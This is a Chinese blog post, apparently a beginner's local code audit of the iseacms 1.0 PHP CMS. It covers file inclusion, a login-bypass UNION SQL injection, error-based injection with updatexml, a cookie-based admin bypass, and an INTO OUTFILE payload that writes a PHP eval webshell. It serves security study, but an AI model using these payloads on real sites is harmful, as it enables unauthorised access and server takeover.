iseacms简单审计

最新推荐文章于 2024-05-20 16:38:56 发布
最新推荐文章于 2024-05-20 16:38:56 发布
阅读量297 收藏
点赞数 1
分类专栏: PHP代码审计
会下雪的晴天
本文链接:https://blog.csdn.net/weixin_43578492/article/details/111089275
版权

文章目录

0x00 前言

第一次审计cms,粗糙了些,webU•ェ•*U的究极还是代码审计吧,先从简单的开始

0x01开庭

从网上下载iseacms在本地搭建好,先用seay审计工具来一波
在这里插入图片描述

0x02 文件包含(LFI)

第一个就是典型的LFI,本地写个phpinfo试试,可以
在这里插入图片描述

0x03 登陆sql注入

翻翻admin
进后台登陆界面,login.php先判断是否存在这个用户,在判断输入的密码的md5与数据库是否一致

  • 万能密码
    ctf里面也考过这个,通过联合查询控制我们想要的pass,上图
    在这里插入图片描述
    先查询一个不存在的用户,在联合一个admin,控制pass进行登录,payload:user: yq1ng'union select 1,2,'admin','c4ca4238a0b923820dcc509a6f75849b',5,6,7,8#,pass:1
    user那一串是1的md5
    • 报错注入
      源码没有屏蔽mysql的报错,而是将其输出,试试报错注入
      user: yq1ng'or updatexml(1,concat("~",(select database()),"~"),1)#, pass随意,即可爆出数据库名
      注意:报错回显最多32位,查pass需要截取

0x04 越权?

登陆成功有个setcookie,或许检查存在cookie后就进入后台了?全局搜搜cookie
在这里插入图片描述
只要cookie不为空即可登陆,好耶,直接增加cookie:user:admin值随意,url为http://127.0.0.1/iseacms/admin/?r=index直接进了后台
查看下文件引用,挺多哈,直接改个cookie就是admin了,好耶
在这里插入图片描述

0x05 getshell

利用登陆页面的报错得知MySQL的安装路径,例如本机为D:\Software\phpstudy_pro\Extensions\MySQL8.0.12得知是PHP study搭建的网站,所以猜测网站路径为D:\Software\phpstudy_pro\WWW\iseacms,写马,开始用报错写不进去,经M3师傅点醒,联合注入写马,payload:login=yes&password=1&user=yq1ng' union select 1,"admin",1,1,1,1,1,'<?php @eval($_POST["yq1ng"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\shell.php'#虽然会报错,但是马儿还是写进去了
在这里插入图片描述

0x06 最后

菜鸡止步于此,本来想试试xss,结果提交后跳到其他地方了,我也懒得改源码了,总的来说审cms挺有意思的,虽然这个比较简单吧,难的就劝退了嘤嘤嘤

会下雪的晴天
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
熊海CMS审计(新手入门1)
qq_47094508的博客
06-15 1766
准备环境:phpstudy xhcms源码 seay审计工具 小P记得php版本小于7 先用工具梭一下,为啥要梭一下,因为别人也梭了 工具在末尾 1.文件包含 通过get方式接受r的参数,传递给files,action判断文件名不为空或者等于index,然后通过include函数去包含r传参的文件 例如写了一个phpinfo到files目录下 通过文件包含去调用phpinfo 写到www目录下也可通过../去包含 文件包含不能连shell吗 有知道........
熊海(isea cms)代码审计漏洞总结
Alexz__的博客
04-30 4546
iseacms简介 后台越权登录admin用户 后台/admin下SQL注入 文件包含漏洞 存储型XSS 管理界面CSRF删除文章 壹 iseacms简介 熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发; 网站样式设计简洁大方,整体功能点并不多,但功能正好够用;拥有一个前端客户端访问界面和一个完备的后台管理系统,并...
代码审计系列:熊海CMS V1.0 (iseaCMS_1.0)
闵行小鱼塘
07-12 5039
学习练习代码审计,找来据说很多洞对新手友好的 熊海CMS V1.0,15年的CMS
SeaCMS海洋影视管理系统dmku存在SQL注入漏洞
最新发布
weixin_43167326的博客
05-20 1052
海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。SeaCMS是基于GPL协议100%开源免费,自适应电脑、手机、平板、APP多终端入口,无加密、安全有保障!SeaCMS dmku存在SQL 注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
seacms 远程命令漏洞执行 (CNVD-2020-22721)
xy_wjyjw的博客
10-27 222
点击系统——后台IP安全设置(输入允许 IP:127.0.0.1)打开虚拟终端,输入命令dir /tmp,查看flag。利用漏洞的IP,用蚁剑连接漏洞,连接成功。点击Forward放包,发送到网站。进入bp的网站,并输入url地址。抓包成功,注入一句话密码。填入flag,成功通关。在bp中点击开始抓包。
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1695
【seaCms-命令执行】后门代码写入可解析文件中
SeaCMS_v10.1代码审计实战1
08-03
【SeaCMS_v10.1 代码审计实战】 SeaCMS_v10.1 是一个针对初学者的代码审计平台,特别适合对网络安全感兴趣并希望通过实践学习CMS(内容管理系统)安全的爱好者。在这个版本中,我们可以看到它使用了PHP语言开发,...
CMS v1.0
07-04
$appId = ''; // 站点的APPID (请勿修改和泄漏) $appKey = '';// 站点的APP KEY(请勿修改和泄漏) $taobao_putongpid = ''; //网站普通PID 请填写PID ! $taobao_queqiaopid = '';//鹊桥PID 请填写PID !...
熊海个人网站 1.0
04-30
熊海于2014年开发的一套个人网站系统,是我开源的第一款PHP的程序,虽然定位于个人网站系统,但界面及总体风格没有作过多的倾向性。本程序前后台均采用HTML5、CSS3,响应式布局,完美支持各种浏览...以简洁轻量为主。
seacms海洋cms影视管理系统 v9.1.zip
07-07
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
命令执行漏洞--seacms 10.1
m0_62202418的博客
11-26 354
输入IP:127.0.0.1,点击确定,即可提交信息。通过账号密码:admin/admin 进行登录。机会只有一次(如果失败的话,需要重新启动环境)此处需要BurpSuite 进行数据包拦截。找到上传的数据包,发送到Repeater模块。上数据包提交到服务器,Forward提交。访问80端口的映射端口,进入cms。找到 系统--后台IP 安全设置。成功,一句话木马已经传入服务器。在/tmp 文件下找到flag。修改数据包,注入一句话木马。
海洋cms(海洋视频内容管理系统) v6.64
10-10
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立
Seacms漏洞
Grey的博客
07-10 5037
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
iseacms1.0漏洞复现
wanguixiu的博客
06-29 317
iseacms1.0漏洞复现 作者: admin 时间: 2021-06-29 分类: 漏洞复现 Index.php源码<?php error_reporting(0); $file=addslashes($_GET['r']); $action=$file==''?'index':$file; include('files/'.$ac...
seacms sql注入
Matthew
08-30 5767
最近在学习代码审计,审到一个注入,提交,说重复了,好尴尬啊。 源码下载:http://www.mycodes.net/47/7976.htm 在/i.php,获取ip的时候,全局的ip获取是做了正则。不知道问什么这里重新进行了一次ip的获取。<?php session_start(); require_once("include/common.php"); require_once(sea_I
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 6076
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
熊海cms1.0(代码审计入门学习用)
Npceer-一位网安初学者的博客
09-27 3750
复现复现复现环境搭建这里出了两个问题 第一个第二个开始审计部分1.文件包含2.一个越权/inc/checklogin.php3.sql注入1.admin/login.php2.admin/files/newlink.php3.admin/files/reply.php4.admin/files/software.php5.admin/files/editlink.php 这5个都是一样留言板有xss1.files/contact.php反射XSS2.files/list.php同上 不写了下来翻了很多博客
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 563
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)
weixin_52351575的博客
09-21 483
在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值